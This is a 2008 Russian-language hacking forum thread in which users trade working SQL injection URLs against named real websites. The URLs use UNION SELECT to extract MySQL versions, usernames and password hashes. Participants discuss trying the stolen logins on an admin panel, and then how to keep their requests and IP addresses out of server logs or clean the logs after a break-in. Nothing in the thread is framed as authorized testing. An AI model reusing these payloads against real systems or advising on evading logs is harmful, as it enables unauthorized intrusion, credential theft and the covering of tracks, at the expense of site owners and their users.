ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3141  
Старый 02.09.2008, 00:47
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

MirA спасибо. Люди, а как быть здесь, есть вот чего
Цитата:
http://www.sarbc.ru/tvnew/print.phtml?type=2&channel_id=-1+union+select+concat_ws(0x3a,version(),user,passw ord),2,3+from+mysql.user+limit+34,50/*

http://www.sarbc.ru/tvnew/print.phtml?type=2&channel_id=-1+union+select+concat_ws(0x3a,version(),login,pass wd),2,3+from+user+limit+18,5/*
Но логины не подходят к админке http://www.sarbc.ru/admin
И хэш декодеры говорят, что мол, формат неверный, как быть-то вроде всё ж на ладони. Поможите пожалуйста, заранее благодарен.
 
Ответить с цитированием

  #3142  
Старый 02.09.2008, 00:59
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от masterBlack  
1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables/* -фсЁ ок)
2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273/* -фсЁ ок)
3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+f rom+users/*
tor4),MirA
Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?
 
Ответить с цитированием

  #3143  
Старый 02.09.2008, 01:10
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529

Репутация: 41
По умолчанию

Цитата:
Сообщение от jokester  
tor4),MirA
Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?
Проверил, инекция была и сплыла) Быстро работают админы.
Думаю пароли тоже сменил.

Последний раз редактировалось tor4); 02.09.2008 в 01:20..
 
Ответить с цитированием

  #3144  
Старый 02.09.2008, 01:19
masterBlack
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897

Репутация: 3
По умолчанию

Ясн...:-(:-(:-(

Последний раз редактировалось masterBlack; 02.09.2008 в 01:35..
 
Ответить с цитированием

  #3145  
Старый 02.09.2008, 01:34
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

вообще-то логи ведутся всегда (если конечно админ сам не отключил логирование).. другой вопрос смотрит ли админ в эти логи... если смотрит, то все ваши запросы там есть, значит видно где дырка и ее нужно исправить=)
 
Ответить с цитированием

  #3146  
Старый 02.09.2008, 01:38
masterBlack
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897

Репутация: 3
По умолчанию

Ясн...а мона этого как то избежат?
ну чтоб мои запросы не попадали в логи...
 
Ответить с цитированием

  #3147  
Старый 02.09.2008, 01:42
masterBlack
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897

Репутация: 3
По умолчанию

А Моя айпиха тож там светица?
 
Ответить с цитированием

  #3148  
Старый 02.09.2008, 01:48
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Избежать нельзя.. Если только после взлома как такого не почистить логи. Твой Ip так же записывается в логах.
 
Ответить с цитированием

  #3149  
Старый 02.09.2008, 01:58
masterBlack
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897

Репутация: 3
По умолчанию

Ясн...
мля чувствую влипну кодат по неопытности...я то думал носки одевать кода в админику вхожу...а оно...
 
Ответить с цитированием

  #3150  
Старый 02.09.2008, 02:11
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529

Репутация: 41
По умолчанию

Что-же чистить после взлома?
Или где же эти логи?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ